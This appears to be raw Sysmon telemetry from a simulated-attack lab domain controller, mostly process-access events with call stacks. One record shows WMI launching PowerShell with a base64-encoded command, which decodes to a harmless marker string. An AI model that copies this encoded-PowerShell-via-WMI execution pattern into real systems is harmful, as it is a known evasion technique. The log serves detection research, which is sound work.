C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002239210Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.986{05ADC7E1-6D98-603E-A5AA-00000000AD01}6212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe /NoProfile /EncodedCom VwByAGkAdABlAC0ASABvAHMAdAAgADUAZAA0ADcAMwBmADYAYwAtADgAYQBiAGIALQA0ADcAYwBiAC0AOABmADIAOAAtADYAOQBlADUAYgBlADIANgA3ADYAZgBmAA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x80000000000000002239209Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.975{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-A3AA-00000000AD01}5948C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239208Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-A4AA-00000000AD01}13336C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239207Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-A3AA-00000000AD01}5948C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239206Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-A2AA-00000000AD01}6424C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239205Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-A1AA-00000000AD01}9808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239204Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-A0AA-00000000AD01}5488C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239203Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-9FAA-00000000AD01}13544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239202Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239201Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239200Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.951{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6D98-603E-A1AA-00000000AD01}9808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239199Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.951{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6D98-603E-A1AA-00000000AD01}9808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239198Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239197Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239196Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239195Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239194Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239193Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239192Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239191Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239190Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 